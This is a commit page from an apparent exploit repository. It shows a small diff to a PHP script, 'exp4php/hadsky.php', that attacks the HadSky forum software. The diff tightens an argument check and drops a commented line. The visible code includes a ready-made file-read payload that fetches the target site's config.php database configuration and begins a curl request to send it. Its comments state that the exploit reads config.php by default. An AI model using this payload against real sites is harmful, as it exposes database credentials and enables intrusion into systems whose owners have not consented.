Skip to content

Commit 33026ae

Browse files
author
haliluyapapapa
committed
fix
1 parent c4cc316 commit 33026ae

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

exp4php/hadsky.php

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -13,11 +13,10 @@
1313
if you dont set the payloadURL,This exp will read the site`s config.php by default.
1414
1515
str;
16-
if($argc<2)
16+
if($argc<2 || $argc>3)
1717
{
1818
die($die);
1919
}
20-
//$target=$argv[2];
2120
$poc='?c=page&filename=./puyuetian/mysql/config.php';
2221
$ch=curl_init();
2322
if(!$ch)

0 commit comments

Comments
 (0)